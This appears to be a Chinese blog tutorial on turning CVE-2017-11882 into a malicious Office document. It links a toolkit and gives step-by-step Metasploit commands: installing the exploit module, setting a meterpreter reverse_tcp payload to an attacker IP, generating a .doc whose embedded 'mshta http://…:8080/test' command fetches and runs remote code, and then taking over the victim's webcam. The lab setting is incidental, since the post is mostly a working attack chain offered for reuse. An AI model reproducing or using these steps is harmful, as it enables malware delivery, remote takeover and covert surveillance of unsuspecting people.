1. 程式人生 > >cve-2017-11882生成office惡意文件

cve-2017-11882生成office惡意文件

offic 運行 comm ice sha lis and uid code

2017年11月14日,微軟發布了11月份的安全補丁更新,其中比較引人關註的莫過於悄然修復了潛伏17年之久的Office遠程代碼執行漏洞(CVE-2017-11882)。該漏洞為Office內存破壞漏洞,影響目前流行的所有Office版本。×××者可以利用漏洞以當前登錄的用戶的身份執行任意命令。漏洞影響版本:Office 365
Microsoft Office 2000

                  Microsoft Office 2003      

                  Microsoft Office 2007 Service Pack 3

                  Microsoft Office 2010 Service Pack 2

                  Microsoft Office 2013 Service Pack 1

                  Microsoft Office 2016

工具鏈接:https://pan.baidu.com/s/1cAPboI5lawjxD2VPT13ABA 密碼:fxrf
還是老樣子KaliLinux做gongji機 ip:192.168.1.126
受害者主機Windows7 ip:192.168.1.128
1.首先把cve開頭的文件放到kalilinux使用
技術分享圖片
2.將cve_2017_11882.rb文件復制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目錄下
mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

ls /usr/share/metasploit-framework/modules/exploits/windows/smb/ 查看一下
技術分享圖片
3.再將cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/ 目錄下
mv cve_2017_11882.rtf /usr/share/metasploit-framework/data/exploits
ls /usr/share/metasploit-framework/data/exploits
技術分享圖片
4.打開神器圖形化操作的msf(命令都一樣只是這個更容易方便演示)
技術分享圖片
為了你們太萌新我特地標了一下如何掃描ip地址和爆系統然後輸入ip地址即可(只是為了效果好而已)
技術分享圖片

小電腦就出來了還猜出來是Windows7
技術分享圖片
5.然後在下面輸入search cve_2017_11882查看有沒有加載進去這個模塊
技術分享圖片
可能我版本比較高所以官方已經出了這個模塊所以有兩個
6.use exploit/windows/smb/cve_2017_11882 使用這個模塊
技術分享圖片
7.set payload windows/meterpreter/reverse_tcp
show options 查看一下配置
技術分享圖片
8.set lhost 192.168.1.126 為自己的×××機
set uripath emmm emmm為路徑稍後用python生成腳本的時候用得到(後面我又改成test了 然後 set lport 4444改一下端口才運行)
show options 再看一下配置

(後面uripath我又改成test了 然後 set lport 4444改一下端口才運行)
技術分享圖片
9.exploit -j 運行
技術分享圖片
10.在終端生成doc文件
python Command109b_CVE-2017-11882.py -c "mshta http://192.168.1.126:8080/test" -o test.doc 生成doc文件
技術分享圖片
然後將doc文件放到Windows7上(順便安裝office)
技術分享圖片
看到這個文檔然後手賤點了一下
技術分享圖片
成功
技術分享圖片
然後還是老樣子
getuid getpid getvnc
技術分享圖片
webcam_list 查看下攝像頭 webcam_snf 1 照個照片 webcam_stream 開個網頁查看攝像頭
技術分享圖片

cve-2017-11882生成office惡意文件